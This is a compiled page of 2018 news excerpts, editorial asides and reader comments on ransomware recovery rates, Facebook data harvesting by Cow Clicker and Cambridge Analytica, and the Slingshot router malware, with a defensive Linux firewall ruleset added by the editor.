(bleepingcomputer.com) A massive survey of nearly 1,200 IT security practitioners and decision makers across 17 countries reveals that half the people who fell victim to ransomware infections last year were able to recover their files after paying the ransom demand. The survey, carried out by research and marketing firm CyberEdge Group, reveals that paying the ransom demand, even if for desperate reasons, does not guarantee that victims will regain access to their files. Timely backups are still the most efficient defense against possible ransomware infections, as they allow easy recovery. The survey reveals that 55% of all responders suffered a ransomware infection in 2017, compared to the previous year's study, when 61% experienced similar incidents. Of all the victims who suffered ransomware infections, CyberEdge discovered that 61.3% opted not to pay the ransom at all. Some lost files for good (8%), while the rest (53.3%) managed to recover files, either from backups or by using ransomware decrypter applications. Of the 38.7% who opted to pay the ransom, a little less than half (19.1%) recovered their files using the tools provided by the ransomware authors.

[Mar 27, 2018] My Cow Game Extracted Your Facebook Data

Mar 27, 2018 | tech.slashdot.org

(theatlantic.com) Already in 2010, it felt like a malicious attention market where people treated friends as latent resources to be optimized. Compulsion rather than choice devoured people's time. Apps like FarmVille sold relief for the artificial inconveniences they themselves had imposed. In response, I made a satirical social game called Cow Clicker. Players clicked a cute cow, which mooed and scored a "click." Six hours later, they could do so again. They could also invite friends' cows to their pasture, buy virtual cows with real money, compete for status, click to send a real cow to the developing world from Oxfam, outsource clicks to their toddlers with a mobile app, and much more. It became strangely popular, until eventually, I shut the whole thing down in a bovine rapture -- the "cowpocalypse." It's kind of a complicated story.

But one worth revisiting today, in the context of the scandal over Facebook's sanctioning of user-data exfiltration via its application platform. It's not just that abusing the Facebook platform for deliberately nefarious ends was easy to do (it was). But worse, in those days, it was hard to avoid extracting private data, for years even, without even trying. I did it with a silly cow game. Cow Clicker is not an impressive work of software. After all, it was a game whose sole activity was clicking on cows. I wrote the principal code in three days, much of it hunched on a friend's couch in Greenpoint, Brooklyn. I had no idea anyone would play it, although over 180,000 people did, eventually. And yet, if you played Cow Clicker, even just once, I got enough of your personal data that, for years, I could have assembled a reasonably sophisticated profile of your interests and behavior. I might still be able to; all the data is still there, stored on my private server, where Cow Clicker is still running, allowing players to keep clicking where a cow once stood, before my caprice raptured them into the digital void.

[Mar 27, 2018] 'Slingshot' Malware That Hid For Six Years Spread Through Routers

Mar 27, 2018 | it.slashdot.org

BeauHD on Monday March 12, 2018 @08:10PM from the under-the-radar dept. An anonymous reader quotes a report from Engadget: Security researchers at Kaspersky Lab have discovered what's likely to be another state-sponsored malware strain, and this one is more advanced than most. Nicknamed Slingshot, the code spies on PCs through a multi-layer attack that targets MikroTik routers. It first replaces a library file with a malicious version that downloads other malicious components, and then launches a clever two-pronged attack on the computers themselves. One, Canhadr, runs low-level kernel code that effectively gives the intruder free rein, including deep access to storage and memory; the other, GollumApp, focuses on the user level and includes code to coordinate efforts, manage the file system and keep the malware alive. Kaspersky describes these two elements as "masterpieces," and for good reason. For one, it's no mean feat to run hostile kernel code without crashes. Slingshot also stores its malware files in an encrypted virtual file system, encrypts every text string in its modules, calls services directly (to avoid tripping security software checks) and even shuts components down when forensic tools are active. If there's a common method of detecting malware or identifying its behavior, Slingshot likely has a defense against it. It's no wonder that the code has been active since at least 2012 -- no one knew it was there. Recent MikroTik router firmware updates should fix the issue. However, there's concern that other router makers might be affected.

[Mar 25, 2018] Surveillance is the DNA of the Platform Economy

Creating a malware application which masks itself as some kind of pseudo-scientific test and serves as a backdoor to your personal data is a very dirty trick...
Especially dirty if it is used by academic researchers, who in reality are academic scum... An additional type of academic gangsters, in addition to the Harvard Mafia.
Notable quotes:
"... By Ivan Manokha, a departmental lecturer in the Oxford Department of International Development. He is currently working on power and obedience in the late-modern political economy, particularly in the context of the development of new technologies of surveillance. Originally published at openDemocracy ..."
"... The current social mobilization against Facebook resembles the actions of activists who, in opposition to neoliberal globalization, smash a McDonald's window during a demonstration. ..."
"... But as Christopher Wylie, a twenty-eight-year-old Canadian coder and data scientist and a former employee of Cambridge Analytica, stated in a video interview , the app could also collect all kinds of personal data from users, such as the content that they consulted, the information that they liked, and even the messages that they posted. ..."
"... All this is done in order to use data to create value in some way or another (to monetize it by selling to advertisers or other firms, to increase sales, or to increase productivity). Data has become 'the new oil' of global economy, a new commodity to be bought and sold at a massive scale, and with this development, as a former Harvard Business School professor Shoshana Zuboff has argued , global capitalism has become 'surveillance capitalism'. ..."
"... What this means is that platform economy is a model of value creation which is completely dependent on continuous privacy invasions and, what is alarming is that we are gradually becoming used to this. ..."
"... In other instances, as in the case of Kogan's app, the extent of the data collected exceeds what was stated in the agreement. ..."
"... What we need is a total redefinition of the right to privacy (which was codified as a universal human right in 1948, long before the Internet), to guarantee its respect, both offline and online. ..."
"... I saw this video back in 2007. It was originally put together by a Sarah Lawrence student who was working on her paper on social media. The ties of all the original investors to IN-Q-Tel scared me off and I decided to stay away from Facebook. ..."
"... But it isn't just FB. Amazon, Twitter, Google, LinkedIn, Apple, Microsoft and many others do the same, and we are all caught up in it whether we agree to participate or not. ..."
"... Platform Capitalism is a mild description, it is manipulation based on Surveillance Capitalism, pure and simple. The Macro pattern of Corporate Power subsuming the State across every area is fascinating to watch, but a little scary. ..."
"... For his part, Aleksandr Kogan established a company, Global Science Research, that contracted with SCL, using Facebook data to map personality traits for its work in elections (Kosinski claims that Kogan essentially reverse-engineered the app that he and Stillwell had developed). Kogan's app harvested data on Facebook users who agreed to take a personality test for the purposes of academic research (though it was, in fact, to be used by SCL for non-academic ends). But according to Wylie, the app also collected data on their entire -- and nonconsenting -- network of friends. Once Cambridge Analytica and SCL had won contracts with the State Department and were pitching to the Pentagon, Wylie became alarmed that this illegally-obtained data had ended up at the heart of government, along with the contractors who might abuse it. ..."
"... This apparently bizarre intersection of research on topics like love and kindness with defense and intelligence interests is not, in fact, particularly unusual. It is typical of the kind of dual-use research that has shaped the field of social psychology in the US since World War II. ..."
"... Much of the classic, foundational research on personality, conformity, obedience, group polarization, and other such determinants of social dynamics -- while ostensibly civilian -- was funded during the cold war by the military and the CIA. ..."
"... The pioneering figures from this era -- for example, Gordon Allport on personality and Solomon Asch on belief conformity -- are still cited in NATO psy-ops literature to this day ..."
"... This is an issue which has frustrated me greatly. In spite of the fact that the country's leading psychologist (at the very least one of them -- ex-APA president Seligman) has been documented taking consulting fees from Guantanamo and Black Sites goon squads, my social science pals refuse to recognize any corruption at the core of their so-called replicated quantitative research. ..."
Mar 24, 2018 | www.nakedcapitalism.com
Yves here. Not new to anyone who has been paying attention, but a useful recap with some good observations at the end, despite deploying the cringe-making trope of businesses having DNA. That legitimates the notion that corporations are people.

By Ivan Manokha, a departmental lecturer in the Oxford Department of International Development. He is currently working on power and obedience in the late-modern political economy, particularly in the context of the development of new technologies of surveillance. Originally published at openDemocracy

The current social mobilization against Facebook resembles the actions of activists who, in opposition to neoliberal globalization, smash a McDonald's window during a demonstration.

On March 17, The Observer of London and The New York Times announced that Cambridge Analytica, the London-based political and corporate consulting group, had harvested private data from the Facebook profiles of more than 50 million users without their consent. The data was collected through a Facebook-based quiz app called thisisyourdigitallife, created by Aleksandr Kogan, a University of Cambridge psychologist who had requested and gained access to information from 270,000 Facebook members after they had agreed to use the app to undergo a personality test, for which they were paid through Kogan's company, Global Science Research.

But as Christopher Wylie, a twenty-eight-year-old Canadian coder and data scientist and a former employee of Cambridge Analytica, stated in a video interview , the app could also collect all kinds of personal data from users, such as the content that they consulted, the information that they liked, and even the messages that they posted.

In addition, the app provided access to information on the profiles of the friends of each of those users who agreed to take the test, which enabled the collection of data from more than 50 million.

All this data was then shared by Kogan with Cambridge Analytica, which was working with Donald Trump's election team and which allegedly used this data to target US voters with personalised political messages during the presidential campaign. As Wylie, told The Observer, "we built models to exploit what we knew about them and target their inner demons."

'Unacceptable Violation'

Following these revelations the Internet has been engulfed in outrage and government officials have been quick to react. On March 19, Antonio Tajani, President of the European Parliament, stated in a twitter message that misuse of Facebook user data "is an unacceptable violation of our citizens' privacy rights" and promised an EU investigation. On March 22, Wylie communicated in a tweet that he accepted an invitation to testify before the US House Intelligence Committee, the US House Judiciary Committee and UK Parliament Digital Committee. On the same day Israel's Justice Ministry informed Facebook that it was opening an investigation into possible violations of Israelis' personal information by Facebook.

While such widespread condemnation of Facebook and Cambridge Analytica is totally justified, what remains largely absent from the discussion are broader questions about the role of data collection, processing and monetization that have become central in the current phase of capitalism, which may be described as 'platform capitalism', as suggested by the Canadian writer and academic Nick Srnicek in his recent book.

Over the last decade the growth of platforms has been spectacular: today, the top 4 enterprises in Forbes's list of most valuable brands are platforms, as are eleven of the top twenty. Most recent IPOs and acquisitions have involved platforms, as have most of the major successful startups. The list includes Apple, Google, Microsoft, Facebook, Twitter, Amazon, eBay, Instagram, YouTube, Twitch, Snapchat, WhatsApp, Waze, Uber, Lyft, Handy, Airbnb, Pinterest, Square, Social Finance, Kickstarter, etc. Although most platforms are US-based, they are a really global phenomenon and in fact are now playing an even more important role in developing countries which did not have developed commercial infrastructures at the time of the rise of the Internet and seized the opportunity that it presented to structure their industries around it. Thus, in China, for example, many of the most valuable enterprises are platforms such as Tencent (owner of the WeChat and QQ messaging platforms) and Baidu (China's search engine); Alibaba controls 80 percent of China's e-commerce market through its Taobao and Tmall platforms, with its Alipay platform being the largest payments platform in China.

The importance of platforms is also attested by the range of sectors in which they are now dominant and the number of users (often numbered in millions and, in some cases, even billions) regularly connecting to their various cloud-based services. Thus, to name the key industries, platforms are now central in Internet search (Google, Yahoo, Bing); social networking (Facebook, LinkedIn, Instagram, Snapchat); Internet auctions and retail (eBay, Taobao, Amazon, Alibaba); on-line financial and human resource functions (Workday, Upwork, Elance, TaskRabbit), urban transportation (Uber, Lyft, Zipcar, BlaBlaCar), tourism (Kayak, Trivago, Airbnb), mobile payment (Square Order, PayPal, Apple Pay, Google Wallet); and software development (Apple's App Store, Google Play Store, Windows App store). Platform-based solutions are also currently being adopted in more traditional sectors, such as industrial production (GE, Siemens), agriculture (John Deere, Monsanto) and even clean energy (Sungevity, SolarCity, EnerNOC).

User Profiling -- Good-Bye to Privacy

These platforms differ significantly in terms of the services that they offer: some, like eBay or Taobao simply allow exchange of products between buyers and sellers; others, like Uber or TaskRabbit, allow independent service providers to find customers; yet others, like Apple or Google allow developers to create and market apps.

However, what is common to all these platforms is the central role played by data, and not just continuous data collection, but its ever more refined analysis in order to create detailed user profiles and rankings in order to better match customers and suppliers or increase efficiency.

All this is done in order to use data to create value in some way or another (to monetize it by selling to advertisers or other firms, to increase sales, or to increase productivity). Data has become 'the new oil' of global economy, a new commodity to be bought and sold at a massive scale, and with this development, as a former Harvard Business School professor Shoshana Zuboff has argued , global capitalism has become 'surveillance capitalism'.

What this means is that platform economy is a model of value creation which is completely dependent on continuous privacy invasions and, what is alarming is that we are gradually becoming used to this.

Most of the time platform providers keep track of our purchases, travels, interest, likes, etc. and use this data for targeted advertising to which we have become accustomed. We are equally not that surprised when we find out that, for example, robotic vacuum cleaners collect data about types of furniture that we have and share it with the likes of Amazon so that they can send us advertisements for pieces of furniture that we do not yet possess.

There is little public outcry when we discover that Google's ads are racially biased as, for instance, Harvard professor Latanya Sweeney found by accident while performing a search. We are equally hardly astonished that companies such as Lenddo buy access to people's social media and browsing history in exchange for a credit score. And, at least in the US, people are becoming accustomed to the use of algorithms, developed by private contractors, by the justice system to take decisions on sentencing, which often result in equally unfair and racially biased decisions.

The outrage provoked by the Cambridge Analytica is targeting only the tip of the iceberg. The problem is infinitely larger as there are countless equally significant instances of privacy invasions and data collection performed by corporations, but they have become normalized and do not lead to much public outcry.

DNA

Today surveillance is the DNA of the platform economy; its model is simply based on the possibility of continuous privacy invasions using whatever means possible. In most cases users agree, by signing the terms and conditions of service providers, so that their data may be collected, analyzed and even shared with third parties (although it is hardly possible to see this as express consent given the size and complexity of these agreements -- for instance, it took 8 hours and 59 minutes for an actor hired by the consumer group Choice to read Amazon Kindle's terms and conditions). In other instances, as in the case of Kogan's app, the extent of the data collected exceeds what was stated in the agreement.

But what is important is to understand that to prevent such scandals in the future it is not enough to force Facebook to better monitor the use of users' data in order to prevent such leaks as in the case of Cambridge Analytica. The current social mobilization against Facebook resembles the actions of activists who, in opposition to neoliberal globalization, smash a McDonald's window during a demonstration.

What we need is a total redefinition of the right to privacy (which was codified as a universal human right in 1948, long before the Internet), to guarantee its respect, both offline and online.

What we need is a body of international law that will provide regulations and oversight for the collection and use of data.

What is required is an explicit and concise formulation of terms and conditions which, in a few sentences, will specify how users' data will be used.

It is important to seize the opportunity presented by the Cambridge Analytica scandal to push for these more fundamental changes.



Arizona Slim , , March 24, 2018 at 7:38 am

I am grateful for my spidey sense. Thanks, spidey sense, for ringing the alarm bells whenever I saw one of those personality tests on Facebook. I never took one.

Steve H. , , March 24, 2018 at 8:05 am

First they came for

The most efficient strategy is to be non-viable. They may come for you eventually, but someone else gets to be the canary, and you haven't wasted energy in the meantime. TOR users didn't get that figured out.

Annieb , , March 24, 2018 at 2:02 pm

Never took the personality test either, but now I know that all of my friends who did unknowingly gave up my personal information too. I read an article somewhere about this over a year ago so it's really old news. Sent the link to a few people who didn't care. But now that they all know that Cambridge Analytica used FB data in support of the Trump campaign it's all over the mainstream and people are upset.

ChrisPacific , , March 25, 2018 at 4:07 pm

You can disable that (i.e., prevent friends from sharing your info with third parties) in the privacy options. But the controls are not easy to find and everything is enabled by default.

HotFlash , , March 24, 2018 at 3:13 pm

I haven't FB'd in years and certainly never took any such test, but if any of my friends, real or FB, did, and my info was shared, can I sue? If not, why not?

Octopii , , March 24, 2018 at 8:06 am

Everyone thought I was paranoid as I discouraged them from moving backups to the cloud, using trackers, signing up for grocery store clubs, using real names and addresses for online anything, etc. They thought I was overreacting when I said we need European-style privacy laws in this country. People at work thought my questions about privacy for our new location-based IoT plans were not team-based thinking.

And it turns out after all this that they still think I'm extreme. I guess it will have to get worse.

Samuel Conner , , March 24, 2018 at 8:16 am

In a first for me, there are surface-mount resistors in the advert at the top of today's NC links page. That is way out of the ordinary; what I usually see are books or bicycle parts; things I have recently purchased or searched.

But a couple of days ago I had a SKYPE conversation with a sibling about a PC I was scavenging for parts, and surface mount resistors (unscavengable) came up. I suspect I have been observed without my consent and am not too happy about it. As marketing, it's a bust; in the conversation I explicitly expressed no interest in such components as I can't install them. I suppose I should be glad for this indication of something I wasn't aware was happening.

Collins , , March 24, 2018 at 9:14 am

Had you used your computer keyboard previously to search for 'surface mount resistors', or was the trail linking you & resistors entirely verbal?

Samuel Conner , , March 24, 2018 at 10:15 am

No keyboard search. I never so much as think about surface mount components; the inquiry was raised by my sibling and I responded. Maybe it's coincidental, but it seems quite odd.

I decided to click through to the site to generate a few pennies for NC and at least feel like I was punishing someone for snooping on me.

Abi , , March 25, 2018 at 3:24 pm

It's been happening to me a lot recently on my Instagram, I don't like pictures or anything, but whenever I have a conversation with someone on my phone, I start seeing ads of what I spoke about

ChiGal in Carolina , , March 25, 2018 at 10:12 am

I thought it came out a while ago that Skype captures and retains all the dialogue and video of convos using it.

Eureka Springs , , March 24, 2018 at 8:44 am

What we need is a total redefinition of the right to privacy (which was codified as a universal human right in 1948, long before the Internet), to guarantee its respect, both offline and online.

Are we, readers of this post, or citizens of the USA supposed to think there is anything binding in declarations? Or anything from the UN if at all inconvenient for that matter?

https://www.un.org/en/universal-declaration-human-rights/
Article 12.

No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honour and reputation. Everyone has the right to the protection of the law against such interference or attacks.

Platforms like facebook allow individuals to 'spy' on each other and people love it. When I was a kid I always marveled at how some households would leave a police scanner on 24/7. With the net we have this writ large with baby, puppy and tv dinner photos. Not to forget it's a narcissist paradise. I have friends who I've tried to gently over time inject tidbits of info like this article provides for many years and they still just refuse to try and get it. If they looked over their shoulder and saw how many people/entities are literally following them everywhere they go, they would become rabid gun owners (don't tread on me!) overnight, but the invisible hand/eye registers not at all.

Pelham , , March 24, 2018 at 9:13 am

A side note: If Facebook and other social media were to assume ANY degree of responsibility for content appearing on their platforms, they would be acknowledging their legal liability for ALL content.

Hence they would be legally responsible just as newspapers are. And major newspapers have on-staff lawyers and editors exquisitely attuned to the possibility of libelous content so they can avoid ruinous lawsuits.

If the law were applied as it should be, Facebook and its brethren wouldn't last five minutes before being sued into oblivion.

albert , , March 24, 2018 at 6:27 pm

" being sued into oblivion ." If only.

Non-liability is a product of the computer age. I remember having to agree with Microsoft's policy to absolve them of -any- liability when using their software. If they had their druthers, -no- company would be liable for -anything-. It's called a 'perfect world'.

Companies that host 'social media' should not have to bear any responsibility for their users content. Newspapers employ writers and fact checkers. They are set up to monitor their staff for accuracy (Okay, in theory). So you can sue them and even their journalist employees. Being liable (and not sued) allows them to brag about how truthful they are. Reputations are a valuable commodity these days.

In the case of 'social media' providers, liability falls on the authors of their own comments, which is only fair, in my view. However, I would argue that those 'providers' should -not- be considered 'media' like newspapers, and their members should not be considered 'journalists'.

Also, those providers are private companies, and are free to edit, censor, or delete anything on their site. And of course it's automated. Some conservative Facebook members were complaining about being banned. Apparently, there a certain things you can't say on Facebook.

AFAIC, the bottom line is this: Many folks tend to believe everything they read online. They need to learn the skill of critical thinking. And realize that the Internet can be a vast wasteland; a digital garbage dump.

Why are our leaders so concerned with election meddling? Isn't our propaganda better than the Russians? We certainly pay a lot for it.
. .. . .. -- .

PlutoniumKun , , March 24, 2018 at 9:52 am

It seems even Elon Musk is now rebelling against Facebook.

Musk Takes Down the Tesla and SpaceX Facebook Pages.

Today, Musk also made fun of Sonos for not being as committed as he was to the anti-Facebook cause after the connected-speaker maker said it would pull ads from the platform -- but only for a week.

"Wow, a whole week. Risky," Musk tweeted.

saurabh , , March 24, 2018 at 11:43 am

Musk, like Trump, knows he does not need to advertise because a fawning press will dutifully report on everything he does and says, no matter how dumb.

Jim Thomson , , March 25, 2018 at 9:39 am

This is rich.

I can't resist: It takes a con to know a con.
(not the most insightful comment)

Daniel Mongan , , March 24, 2018 at 10:14 am

A thoughtful post, thanks for that. May I recommend you take a look at "All You Can Pay" (NationBooks 2015) for a more thorough treatment of the subject, together with a proposal on how to re-balance the equation. Full disclosure, I am a co-author.

JimTan , , March 24, 2018 at 11:12 am

People are starting to download copies of their Facebook data to get an understanding of how much information is being collected from them.

JCC , , March 24, 2018 at 11:29 am

A reminder: https://www.youtube.com/watch?v=iRT9On7qie8

I saw this video back in 2007. It was originally put together by a Sarah Lawrence student who was working on her paper on social media. The ties of all the original investors to IN-Q-Tel scared me off and I decided to stay away from Facebook.

But it isn't just FB. Amazon, Twitter, Google, LinkedIn, Apple, Microsoft and many others do the same, and we are all caught up in it whether we agree to participate or not.

Anyone watch the NCAA Finals and see all the ads from Google about being "The Official Cloud of the NCAA"? They were flat out bragging, more or less, about surveillance of players for the NCAA.

Platform Capitalism is a mild description, it is manipulation based on Surveillance Capitalism, pure and simple. The Macro pattern of Corporate Power subsuming the State across every area is fascinating to watch, but a little scary.

oh , , March 24, 2018 at 1:44 pm

Caveat Emptor: If you watch YouTube, they'll only add to the information that they already have on you!

HotFlash , , March 24, 2018 at 3:27 pm

Just substitute "hook" for "you" in the URL, you get the same video, no ads, and they claim not to track you. YMMV

Craig H. , , March 24, 2018 at 12:21 pm

Privacy no longer a social norm, says Facebook founder; Guardian; 10 January 2010

The Right to Privacy; Warren & Brandeis; Harvard Law Review; 15 December 1890

It was amusing that the top Google hit for the Brandeis article was JSTOR which requires us to surrender personal detail to access their site. To hell with that.

The part I like about the Brandeis privacy story is the motivation was some Manhattan rich dicks thought the gossip writers snooping around their wedding party should mind their own business. (Apparently whether this is actually true or just some story made up by somebody being catty at Brandeis has been the topic of gigabytes of internet flame wars but I can't ever recall seeing any of those.)

Ed , , March 24, 2018 at 2:50 pm

https://www.zerohedge.com/news/2018-03-23/digital-military-industrial-complex-exposed

"Two young psychologists are central to the Cambridge Analytica story. One is Michal Kosinski, who devised an app with a Cambridge University colleague, David Stillwell, that measures personality traits by analyzing Facebook "likes." It was then used in collaboration with the World Well-Being Project, a group at the University of Pennsylvania's Positive Psychology Center that specializes in the use of big data to measure health and happiness in order to improve well-being. The other is Aleksandr Kogan, who also works in the field of positive psychology and has written papers on happiness, kindness, and love (according to his résumé, an early paper was called "Down the Rabbit Hole: A Unified Theory of Love"). He ran the Prosociality and Well-being Laboratory, under the auspices of Cambridge University's Well-Being Institute.

Despite its prominence in research on well-being, Kosinski's work, Cadwalladr points out, drew a great deal of interest from British and American intelligence agencies and defense contractors, including overtures from the private company running an intelligence project nicknamed "Operation KitKat" because a correlation had been found between anti-Israeli sentiments and liking Nikes and KitKats. Several of Kosinski's co-authored papers list the US government's Defense Advanced Research Projects Agency, or DARPA, as a funding source. His résumé boasts of meetings with senior figures at two of the world's largest defense contractors, Boeing and Microsoft, both companies that have sponsored his research. He ran a workshop on digital footprints and psychological assessment for the Singaporean Ministry of Defense.

For his part, Aleksandr Kogan established a company, Global Science Research, that contracted with SCL, using Facebook data to map personality traits for its work in elections (Kosinski claims that Kogan essentially reverse-engineered the app that he and Stillwell had developed). Kogan's app harvested data on Facebook users who agreed to take a personality test for the purposes of academic research (though it was, in fact, to be used by SCL for non-academic ends). But according to Wylie, the app also collected data on their entire -- and nonconsenting -- network of friends. Once Cambridge Analytica and SCL had won contracts with the State Department and were pitching to the Pentagon, Wylie became alarmed that this illegally-obtained data had ended up at the heart of government, along with the contractors who might abuse it.

This apparently bizarre intersection of research on topics like love and kindness with defense and intelligence interests is not, in fact, particularly unusual. It is typical of the kind of dual-use research that has shaped the field of social psychology in the US since World War II.

Much of the classic, foundational research on personality, conformity, obedience, group polarization, and other such determinants of social dynamics -- while ostensibly civilian -- was funded during the cold war by the military and the CIA. The cold war was an ideological battle, so, naturally, research on techniques for controlling belief was considered a national security priority. This psychological research laid the groundwork for propaganda wars and for experiments in individual "mind control."

The pioneering figures from this era -- for example, Gordon Allport on personality and Solomon Asch on belief conformity -- are still cited in NATO psy-ops literature to this day..."

Craig H. , , March 24, 2018 at 3:42 pm

This is an issue which has frustrated me greatly. In spite of the fact that the country's leading psychologist (at the very least one of them -- ex-APA president Seligman) has been documented taking consulting fees from Guantanamo and Black Sites goon squads, my social science pals refuse to recognize any corruption at the core of their so-called replicated quantitative research.

I have asked more than five people to point at the best critical work on the Big 5 Personality theory and they all have told me some variant of "it is the only way to get consistent numbers". Not one has ever retreated one step or been receptive to the suggestion that this might indicate some fallacy in trying to assign numbers to these properties.

They eat their own dog food all the way and they seem to be suffering from a terrible malnutrition. At least the anthropologists have Price. (Most of that book can be read for free in installments at Counterpunch.)

[Mar 23, 2018] Was Destructive 'Slingshot' Malware Deployed by the Pentagon

Rule No. 1: do not buy cheap routers. Do not use routers supplied for free by your ISP. Buy only from proven companies with a good security record. Using your own firewall (a small Linux server is OK) is a must in the current circumstances.
There is no special value in Kaspersky anti-virus software. All such products can be used as a backdoor into your computer (for example, via the update mechanism). Using complex and opaque software actually makes Windows less secure, not more secure. Periodic (say, daily) reinstallation from a trusted image is probably a better way, especially if Windows is really minimized and does not contain third-party software that has its own update mechanisms, or such mechanisms are blocked.
But attacks on routers are a new fashion and should be taken very seriously, as most people pay no attention to this crucial part of their business or home network. In any case a separate firewall is needed behind the Internet router, which now is not that expensive (a decent box can be bought for around $300). For those who know Unix/Linux see, for example, Firewall Micro Appliance or QOTOM (both can run pfSense or your custom Linux solution). For those who don't, see, for example, Zyxel [USG40] ZyWALL (USG) UTM Firewall.
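A minimal ruleset for such a box, added here as an illustration (it is not taken from any of the products named above): an nftables configuration for a two-interface Linux firewall sitting between the ISP router and the LAN, where the router side is treated as untrusted. The interface names, the LAN subnet and the management ports are assumptions.

```nftables
#!/usr/sbin/nft -f
# Added example: two-interface Linux firewall between the ISP router and the LAN.
# Interface names and the LAN subnet are assumed; adjust them to your box.
# IP forwarding must also be enabled: sysctl -w net.ipv4.ip_forward=1

define wan     = "eth0"            # cable to the ISP router (untrusted side)
define lan     = "eth1"            # cable to the LAN switch (trusted side)
define lan_net = 192.168.10.0/24   # assumed LAN subnet

flush ruleset

table inet filter {
    chain input {
        type filter hook input priority 0; policy drop;

        iif lo accept                            # loopback
        ct state established,related accept      # replies to traffic we started
        ct state invalid drop

        # ICMP is kept for path MTU discovery and diagnostics, but rate limited
        meta l4proto { icmp, ipv6-icmp } limit rate 10/second accept

        # the firewall is administered only from the LAN side
        iifname $lan tcp dport 22 accept           # ssh
        iifname $lan udp dport { 53, 67 } accept   # DNS/DHCP, if this box serves them

        # nothing is accepted from the WAN side, including from the ISP router itself;
        # log (rate limited) so that probes arriving from the router side stay visible
        iifname $wan limit rate 5/minute log prefix "fw-wan-drop: "
        iifname $wan drop
    }

    chain forward {
        type filter hook forward priority 0; policy drop;

        ct state established,related accept
        ct state invalid drop
        iifname $lan oifname $wan ip saddr $lan_net accept   # LAN -> Internet only
        # no rule permits WAN -> LAN, so nothing behind the box is reachable from outside
    }

    chain output {
        type filter hook output priority 0; policy accept;
    }
}

table ip nat {
    chain postrouting {
        type nat hook postrouting priority 100; policy accept;
        oifname $wan ip saddr $lan_net masquerade   # hide the LAN behind the box's WAN address
    }
}
```

Load it with `nft -f` and check the live rules with `nft list ruleset`; the "fw-wan-drop:" entries in the kernel log show what the ISP router side is sending toward the box.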
Notable quotes:
"... Further findings suggest that Slingshot had common code with only two other known pieces of software, both malwares, which were attributed to the NSA and CIA, respectively, by analysts. Though various U.S. agencies are all denying comment, things are clearly pointing uncomfortably in their direction. ..."
"... Malware is not a precision munition, it hits wide targets and spreads out to bystanders. This is particularly disturbing to note if, as some reports are indicating, this malware was Pentagon in origin. ..."
Mar 23, 2018 | www.theamericanconservative.com
Slingshot. The malware targeted Latvian-made Internet routers popular in the Middle East, Africa, and Southeast Asia.

Kaspersky's reports reveal that the malware had been active since at least 2012, and speculates that it was government-made, owing to its sophistication and its use of novel techniques rarely seen elsewhere.

Those investigating the matter further have drawn the conclusion that Slingshot was developed by the U.S. government, with some reports quoting former officials as connecting it to the Pentagon's JSOC special forces. For those following the cyber security and malware sphere, this is a huge revelation, putting the U.S. government in the hot seat for deploying cyber attacks that harm a much greater range of innocent users beyond their intended targets.

Kaspersky's own findings note that the code was written in English, using a driver flaw to allow the implanting of various types of spyware. Among those mentioned by Moscow-based Kaspersky was an implant named "GOLLUM," which notably was mentioned in one of the leaked Edward Snowden documents.

Further findings suggest that Slingshot had common code with only two other known pieces of software, both malwares, which were attributed to the NSA and CIA, respectively, by analysts. Though various U.S. agencies are all denying comment, things are clearly pointing uncomfortably in their direction.

Cyberscoop, one of the first news outlets to break the story, reported a mixed reaction among officials. Some noted that Kaspersky Labs was simply doing what a security company is supposed to do. Others, however, were less agreeable, suggesting it was an intentional attempt by Kaspersky to undermine U.S. security.

The argument, as far as it goes, is that given the ostensible target areas -- the Middle East, North Africa, Afghanistan -- Kaspersky should have concluded it was related to the War on Terror and sat on their findings. The Trump administration already views Kaspersky as a sort of hostile actor -- banning the use of Kaspersky products by any government or civilian federal contractor in December, citing Kremlin influence (a charge that has been vehemently denied by the company). This just gives them more justification for seeing Kaspersky as an adversary in the space.

Unfortunately for the Russian company, some American retailers have even followed suit, pulling the software from the shelves on the grounds that it's Russian, and therefore suspect.

There has been no clear evidence that Kaspersky's software was serving as a backdoor for Russian intelligence, though it was reported last fall that sensitive documents were stolen from a National Security Agency (NSA) contractor's laptop via its Kaspersky-made antivirus software. In a statement at the time, the company said, "Kaspersky Lab has never helped, nor will help, any government in the world with its cyberespionage efforts." Turns out that Israeli spies, spying on the Russian spies, disclosed the intrusion to U.S. officials.

Kaspersky has consistently ranked near the top of antivirus ratings from virtually all third-party reviewers. The company has sold its products to nearly 400 million users worldwide, with 60 percent in the U.S. and Western Europe. Until now, Kaspersky was being used by several major agencies in the federal government, including the State Department and Department of Defense.

Ironically, this new Slingshot issue itself appears just to be a testament to how well the company's security works at digging up extremely dangerous malware. It also underscores the uneasy reality that the U.S. has been engaging in its own brand of cyber warfare all along.

Any claims that a specific piece of U.S. malware -- in this case, Slingshot -- was targeting only al-Qaeda or ISIS bad guys is disingenuous as well. The exploit on routers is hitting an entire region, infecting an untold number of innocent people. Internet cafés are said to have been hit in this, meaning everyone going into the cafes is at risk.

Malware is not a precision munition, it hits wide targets and spreads out to bystanders. This is particularly disturbing to note if, as some reports are indicating, this malware was Pentagon in origin.

U.S. civilian government surveillance is already doing great harm to general Internet security, and does so by remaining in denial about the balance of good to harm that is being done. The U.S. military, by contrast, has shown its willingness to inflict major harm on innocents in pursuit of any war goal. As they start hitting regions with malware, all bets are off on how far it will spread.

Security companies like Kaspersky Labs only afford the private user limited protection from all of this malware, because they're constantly playing catch-up, finding new variants and new exploits that the various pieces of software are using. Slingshot, for instance, went undetected for six solid years.

The discovery means fixes can finally be implemented for the routers and the computers. Novel exploits like this are rarely a one-time fix, however, as a slew of similar exploits from other sources tend to crop up after one gets taken out. It's a never-ending battle.

In August, President Trump made U.S. Cyber Command a formal military command, reflecting the growing view of the Internet as a military objective. Much as America's other battlefields result in collateral damage on the ground, the cyberwar is going to have a deleterious impact on day-to-day life in cyberspace. The big questions are how bad things will get, and how quickly.

Jason Ditz is news editor at Antiwar.com, a nonprofit organization dedicated to the cause of non-interventionism. In addition to TAC, his work has appeared in Forbes, Toronto Star, Minneapolis Star-Tribune, Providence Journal, Daily Caller, Washington Times and Detroit Free Press.

[Mar 21, 2018] Never attribute to malice that which can be attributed to a bug in the software

Mar 21, 2018 | consortiumnews.com

JWalters , March 19, 2018 at 10:46 pm

In a casual conversation at a party a computer science researcher from a leading university commented that the vast majority of "denial of service" attacks in this country are done by the federal government. That would probably be the CIA covert ops in service to the bankster oligarchy. The Israelis are also known to have cyber warfare capabilities, and are a central part of the oligarchy, judging by their clear control of the MSM.

